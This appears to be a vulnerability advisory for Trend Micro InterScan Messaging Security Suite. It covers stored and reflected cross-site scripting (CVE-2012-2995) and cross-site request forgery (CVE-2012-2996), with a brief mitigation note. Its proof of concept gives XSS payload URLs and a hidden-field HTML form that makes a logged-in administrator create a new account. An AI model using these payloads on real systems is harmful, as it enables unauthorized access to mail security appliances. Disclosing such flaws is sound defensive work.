Trend Micro InterScan Messaging Security Suite is vulnerable to Cross-site Scripting and Cross-site Request Forgery.
Proof of Concept
The vulnerabilities POC are as follow:
Cross-site Scripting (CVE-2012-2995) (CWE-79)
Persistent/Stored XSS
hxxps://127.0.0.1:8445/addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss"<script>alert('XSS')</script>
Non-persistent/Reflected XSS
hxxps://127.0.0.1/initUpdSchPage.imss?src=<script>alert('XSS')</script>
Cross-Site Request Forgery (CVE-2012-2996) (CWE-352)
<html> <body> <form action="hxxps://127.0.0.1:8445/saveAccountSubTab.imss" method="POST"> <input type="hidden" name="enabled" value="on" /> <input type="hidden" name="authMethod" value="1" /> <input type="hidden" name="name" value="quorra" /> <input type="hidden" name="password" value="quorra.123" /> <input type="hidden" name="confirmPwd" value="quorra.123" /> <input type="hidden" name="tabAction" value="saveAuth" /> <input type="hidden" name="gotoTab" value="saveAll" /> <input type="submit" value="CSRF" /> </form> </body> </html>
Solution
Currently, we are not aware of any vendor solution. You may contact the vendor for patch or update of the product.
As a temporary solution, you may restrict access to this application to prevent unauthorized user make use of this vulnerability.
References
http://cwe.mitre.org/data/definitions/352.html
http://cwe.mitre.org/data/definitions/79.html
http://www.trendmicro.com/us/enterprise/network-security/interscan-message-security/index.html